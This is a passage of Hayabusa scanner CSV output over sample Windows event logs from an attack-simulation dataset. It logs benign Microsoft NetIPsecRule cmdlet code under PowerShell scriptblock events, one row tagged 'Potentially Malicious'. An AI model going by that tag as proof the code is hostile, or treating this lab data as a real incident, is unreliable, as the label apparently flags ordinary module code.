= @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
